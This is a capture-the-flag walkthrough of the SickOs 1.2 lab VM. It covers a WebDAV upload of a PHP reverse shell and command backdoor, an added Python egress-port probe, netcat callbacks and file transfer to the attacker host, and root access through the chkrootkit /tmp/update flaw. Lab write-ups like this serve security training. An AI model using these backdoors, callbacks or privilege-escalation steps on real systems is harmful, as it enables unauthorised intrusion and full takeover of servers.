SickOs: 1.2

This is another challenge on my OSCP list. You can find it here.
Enumeration
Starting with a port scan.
root@redteam:~/vulnhub/sickos# nmap -n -T4 -sC -sV -oN fullscan -p- 192.168.50.141
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 14:16 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00068s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:26:F2:2B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.11 seconds
Webserver
The landing page shows nothing but a picture, and after downloading the image there is nothing special about the file either.
root@redteam:~/vulnhub/sickos# curl -v http://192.168.50.141
* Expire in 0 ms for 6 (transfer 0x563610c89dd0)
*   Trying 192.168.50.141...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x563610c89dd0)
* Connected to 192.168.50.141 (192.168.50.141) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.50.141
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: PHP/5.3.10-1ubuntu3.21
< Content-type: text/html
< Transfer-Encoding: chunked
< Date: Sun, 23 Jun 2019 12:39:35 GMT
< Server: lighttpd/1.4.28
<
<html>
<img src="blow.jpg">
</html>
...[LOT OF EMPTY LINES HERE - SO REMOVED]...
<!-- NOTHING IN HERE ///\\\ -->>>>
* Connection #0 to host 192.168.50.141 left intact
Nothing here…
The X-Powered-By header reveals PHP, so let's run a directory brute-forcer.
It turns up a /test/ folder, which appears to be empty. A quick check of the HTTP OPTIONS for that folder reveals that WebDAV is enabled, with PUT among the allowed methods.
root@redteam:~/vulnhub/sickos# curl -I -X OPTIONS http://192.168.50.141/test/
HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Date: Sun, 23 Jun 2019 12:47:38 GMT
Server: lighttpd/1.4.28
Let's use nmap's http-put script to upload a PHP reverse shell.
root@redteam:~/vulnhub/sickos/dav# nmap -p 80 192.168.50.141 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='/root/vulnhub/sickos/dav/shell.php'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 15:02 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00070s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-put: /test/shell.php was successfully created
MAC Address: 00:0C:29:26:F2:2B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
The upload worked, but after requesting the file from the browser no connection comes back to my listener. Something is blocking the outbound connection.
Taking a step back, I upload a simple PHP backdoor instead. (The array keys are escaped for the shell here; with single quotes nested inside a single-quoted string the shell would drop them, and PHP would only receive unquoted keys.)
root@redteam:~/vulnhub/sickos/dav# echo "<?php if(isset(\$_REQUEST['cmd'])){ echo '<pre>'; \$cmd = \$_REQUEST['cmd']; system(\$cmd); echo '</pre>'; die; } ?>" > cmd.php
root@redteam:~/vulnhub/sickos/dav# nmap -p 80 192.168.50.141 --script http-put --script-args http-put.url='/test/cmd.php',http-put.file='/root/vulnhub/sickos/dav/cmd.php'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 15:21 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00040s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-put: /test/cmd.php was successfully created
MAC Address: 00:0C:29:26:F2:2B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
Ok…the backdoor upload works too. Now to figure out why the reverse shell was not working.
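Rather than guessing listener ports one at a time, a small probe run on the target through the web shell tells you which outbound ports the firewall lets through. This is an added example, not from the original post: probe_egress() attempts a TCP connect to each candidate port and returns the ones that succeed; demo() is a constructed offline stand-in that starts two local listeners and leaves a third port unbound, so it runs without the lab. On the box you would instead run probe_egress('192.168.50.137', [80, 443, 8080, ...]) while the attacking machine listens on each of those ports. The code avoids Python 3-only syntax because the target only has Python 2.

```python
import socket
import threading
from contextlib import closing


def probe_egress(host, ports, timeout=2.0):
    """Try a TCP connect to host on each port; return the ports that connected.

    Run this on the target (e.g. through the web shell) with host set to the
    attacking machine, which must be listening on every candidate port.
    A connect that fails for any reason (filtered, refused, timed out) is
    reported as blocked: the probe cannot tell those cases apart.
    """
    allowed = []
    for port in ports:
        try:
            with closing(socket.create_connection((host, port), timeout=timeout)):
                allowed.append(port)
        except (socket.error, OSError):
            pass
    return allowed


# --- constructed offline stand-in for the attacker-side listeners -----------

def _start_listener():
    """Listen on a free loopback port and accept-and-close in the background."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except (socket.error, OSError):
                return          # listener closed
            conn.close()

    t = threading.Thread(target=accept_loop)
    t.daemon = True
    t.start()
    return srv


def _unbound_port():
    """Pick a loopback port with nothing listening on it (stands in for a blocked port)."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Two 'allowed' ports (listeners up) and one 'blocked' port (nothing bound)."""
    listeners = [_start_listener() for _ in range(2)]
    open_ports = sorted(s.getsockname()[1] for s in listeners)
    blocked = _unbound_port()
    candidates = sorted(open_ports + [blocked])
    allowed = probe_egress("127.0.0.1", candidates, timeout=1.0)
    for s in listeners:
        s.close()
    return {"candidates": candidates, "allowed": allowed, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The probe only distinguishes "connected" from "failed", so every candidate port needs a listener on the attacking side; a port the firewall allows but nobody listens on still shows up as blocked, which is the same symptom as the reverse shell silently failing above.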
root@redteam:~/vulnhub/sickos/dav# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.50.137] from (UNKNOWN) [192.168.50.141] 39237
After a few tries it turns out that outbound connections to port 443 are allowed. Knowing which port gets through, I change the PHP reverse shell to connect to port 443 and upload it again the same way as before. I start a local listener and…
root@redteam:~/vulnhub/sickos/dav# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.50.137] from (UNKNOWN) [192.168.50.141] 39238
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 07:35:16 up  2:22,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Getting a proper TTY.
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/$
Privilege Escalation
To look for privilege-escalation vectors I transfer LinEnum.sh from my machine to the target with Netcat, over port 443 since that is the port allowed out; on the attacking side the file is served from a listener on that same port, and only the receiving end is shown here.
www-data@ubuntu:/tmp$ nc -w3 192.168.50.137 443 > linenum.sh
The LinEnum output shows an interesting SUID binary: /usr/bin/mtr. This site has some information about MTR:
'MTR is a network diagnostic tool that combines ‘ping’ and ‘traceroute’ into one program. A security vulnerability in the product allows execution of arbitrary code, and gaining of elevated privileges. It should be noted that MTR's author does not recommend that the program be executed as setuid root.'
Unfortunately I can't seem to get this exploit to work, so I turn my attention back to the LinEnum report.
The combination of kernel version and OS version is most likely a recipe for a known overlayfs kernel exploit. But that is a well-known, easy exploit, and since this machine is a few years old I'm going to look for another way to escalate privileges first. If nothing else comes up, I can always fall back on it.
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19  2012 /etc/crontab

/etc/cron.daily:
total 72
drwxr-xr-x  2 root root  4096 Apr 12  2016 .
drwxr-xr-x 84 root root  4096 Jun 23 07:13 ..
-rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
-rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
-rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
-rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
-rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
-rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
-rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
-rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
-rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
-rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
-rwxr-xr-x  1 root root  2947 Jun 19  2012 standard
Looking at the daily cron jobs, one stands out: all of them date from the stock install, except chkrootkit, whose script is from June 2014 and which is not part of a default Ubuntu install. So let's check which version is installed.
www-data@ubuntu:/tmp$ chkrootkit -V
chkrootkit version 0.49
root@redteam:~/vulnhub/sickos/exploit# searchsploit chkrootkit
------------------------------------------------------ ----------------------------------------
 Exploit Title                                        |  Path
                                                      | (/usr/share/exploitdb/)
------------------------------------------------------ ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)  | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation          | exploits/linux/local/33899.txt
------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
The exploit text (33899.txt) sums up the bug: 'The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.'
There are many things you can do with this, but since I only need to get into /root I create a file /tmp/update containing chmod -R 777 /root. The file must have the execute bit set, because chkrootkit runs it as a command when the daily cron job fires.
After waiting for the cron job to run…
www-data@ubuntu:/tmp$ ls -ld /root
drwxrwxrwx 4 root root 4096 Jun 23 08:39 /root
www-data@ubuntu:/root$ cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually. Thanks for giving this try. @vulnhub: Thanks for hosting this UP!.
Conclusion
This was indeed a nice challenge to warm up for the OSCP exam. There are a few more challenges to work through before I want to attempt the exam.
Hopefully they will be as interesting as this one.